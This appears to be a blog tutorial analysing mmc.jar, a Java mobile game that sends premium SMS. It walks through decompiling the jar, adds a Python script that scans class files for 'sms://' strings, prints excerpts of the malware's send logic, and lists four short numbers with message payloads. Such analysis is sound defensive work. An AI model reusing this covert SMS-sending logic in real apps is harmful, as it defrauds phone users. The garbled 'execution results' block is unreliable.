PURPOSE
The goal of this post is to identify and analyze the mobile malware file mmc.jar. Follow these steps to complete the task:
- Unpack the file (hint: use zip on the .jar)
- Examine the .class files using the tool available here (local copies for Mac, Linux, Win)
- Find the code that sends SMSes using the 'sms://' URI
- Calculate the short number used in SM.send
- Finally, compile the code using the Eclipse IDE development tool.
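The first three steps can also be scripted as a triage pass before opening a decompiler. The following is an added example, not code from the original post or from the malware: it reads every .class entry in a jar and lists the constant-pool strings that contain sms://. The function names are this example's own, and SAMPLE_CLASS is a constructed stub, not taken from mmc.jar.

```python
import io
import struct
import zipfile

# Payload size after the tag byte for each fixed-size constant-pool entry type.
FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
         15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}

def utf8_constants(data):
    """Return the CONSTANT_Utf8 strings from one .class file's constant pool."""
    magic, _minor, _major, count = struct.unpack(">IHHH", data[:10])
    if magic != 0xCAFEBABE:
        raise ValueError("not a Java class file")
    pos, idx, out = 10, 1, []
    while idx < count:
        tag, pos = data[pos], pos + 1
        if tag == 1:  # CONSTANT_Utf8: u2 length, then that many bytes
            n = struct.unpack(">H", data[pos:pos + 2])[0]
            out.append(data[pos + 2:pos + 2 + n].decode("utf-8", "replace"))
            pos += 2 + n
        elif tag in FIXED:
            pos += FIXED[tag]
        else:
            raise ValueError("unknown constant tag %d" % tag)
        idx += 2 if tag in (5, 6) else 1  # Long/Double occupy two pool slots
    return out

def find_sms_uris(jar, needle="sms://"):
    """Map .class entry name -> constants containing needle (jar: path or file object)."""
    hits = {}
    with zipfile.ZipFile(jar) as zf:
        for name in (n for n in zf.namelist() if n.endswith(".class")):
            try:
                found = [s for s in utf8_constants(zf.read(name)) if needle in s]
            except (ValueError, IndexError, struct.error):
                continue  # truncated or malformed class: skip it, keep scanning
            if found:
                hits[name] = found
    return hits

# Constructed sample (not mmc.jar): header-only class stub, one Long + two Utf8 constants.
SAMPLE_CLASS = (b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 45, 5) + b"\x05"
                + struct.pack(">q", 1000) + b"\x01\x00\x05Slide\x01\x00\x06sms://")

if __name__ == "__main__":
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as out_jar:
        out_jar.writestr("M.class", SAMPLE_CLASS)
    print(find_sms_uris(buf))
```

A hit only tells you which class to open in the decompiler; a destination that is assembled at run time, as in the SM.send call examined below, does not appear as a literal.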
ANALYSIS
After running the decompiler, we examine and analyze the Java source code. In class M.class, at line 343, we found the following source code:
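// Excerpt from M.class (line 343): decides when an SMS is sent
if ((i >= 35) && (SM.isSending != true) && (i % 6 == 0) && (f < count_query)) {
    if (SM.GS()) f += 1;
    if (f == 1) {
        RS.L(rs);
        RS.L("Slide");
        rs = RS.j("Slide");
        game = RS.L(rs, Integer.toString((int)(System.currentTimeMillis() / 1000L)));
        RS.L(rs);
    }
    if (f < count_query) {
        // ms[1][b] holds the destination short number, ms[2][b] the message text
        game = SM.send("sms://" + ms[1][b], ms[2][b]); // sms://
        if (b == count_query) b = 1; else b += 1;
    }
    // (excerpt ends here; the rest of the block is not shown)

// Excerpt from class SM: static entry point called above
public static int send(String s, String s1)
{
    if (isSending) return 0;   // a send is already in progress
    new SM(s, s1);             // the constructor starts the sending thread
    return -1;
}

// Excerpt from class SM: constructor stores destination and message, then starts a thread
public SM(String s, String s1) {
    success = false;
    isSending = true;
    this.destination = s;
    this.message = s1;
    try {
        Thread thread = new Thread(this);
        thread.start();
    }
    catch (Exception exception) {
        isSending = false;
    }
    // (excerpt ends here)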
The code above checks whether the message and the destination are correct and whether the message is sent. The call in M.class corresponds to the first public static method, named send, which takes the two string values s and s1.
All of the above was extracted with JD-GUI version 0.3.3 and JD-Core version 0.6.0, using the search function in the menu bar with criteria matching our needs.
Below are the execution results produced by Eclipse after compiling the code:
/0SIF|6XI8ULE|YNLD5QDA6WM|YJ90RL/+WPJDAFY2 DC3QJ/+3RKA/5YPA0MD-5QFD
while
7375/88600168904|7202/65510006691|1899/FTEME 1283|8385/88600168904|
1 16
2 33
3 49
4 66
7375 88600168904 //sms://7375
7202 65510006691 //sms://7202
1899 fteme 1283 //sms://1899
8385 88600168904 //sms://8385
decoded
36 7375 88600168904
42 7202 65510006691
48 1899 fteme 1283
54
From the results above, obtained after compiling the code, we have identified the number of SMS URLs and the exact URLs.
CONCLUSION
We live in a world where the most essential tool for everyday work and communication is the mobile phone or smartphone. We use it for communication, sending SMS, playing games, checking e-mail, social networking, bank transactions, etc. That is why today there are hundreds of mobile malware files, and the number rises every day. We need to be sure of what we install on our devices: what kind of games, applications, etc. This post is meant to help people who are interested in learning the basics of how to analyze and identify malware files for mobile phones. However, it covers only the basics, and serves as a guide to the kinds of tools and applications you should have. This task was done only for a mobile malware game written in Java.
Furthermore, from the section above we have identified the number of SMSes that are sent and the numbers they are sent to. The total number of SMSes is 4, sent to the following URLs:
sms://7375
sms://7202
sms://1899
sms://8385
Finally, mobile malware is rising and is about to explode; therefore users need education [1]. By delivering basic and advanced mobile malware security awareness programs, we will have fewer malware attacks and better security policy in everyday mobile and smartphone usage.
Bibliography
[1] Chris Martin, Mobile malware is about to explode, users need education, 20 Jan. 2012, http://www.theinquirer.net/inquirer/opinion/2140338/mobile-malware-explode-users-education